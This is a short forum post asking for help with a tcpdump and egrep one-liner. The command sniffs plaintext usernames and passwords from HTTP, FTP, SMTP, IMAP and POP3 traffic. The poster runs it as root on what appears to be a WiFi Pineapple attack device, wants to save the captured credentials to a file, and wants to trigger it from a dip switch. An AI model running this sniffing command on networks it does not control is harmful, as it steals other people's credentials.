overwraith Posted May 12, 2014 (edited)

So I found this command online:

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

At this website: http://www.commandlinefu.com/commands/view/10882/plaintext-credentials-sniffing-with-tcpdump-and-grep

Have been scouring the web, trying to figure out its syntax, and I tried to modify it to send output to a file. Does anybody know what I am doing wrong? Do you all have some commands that are more useful? Here is what I tried to send it to a file:

root@Pineapple:~# tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20 > stuff.txt

Would be cool to be able to run this from a dip switch. The color part of the command seems non-useful, and the command only lasts a couple of seconds; I was expecting it to run longer.

Edited May 16, 2014 by overwraith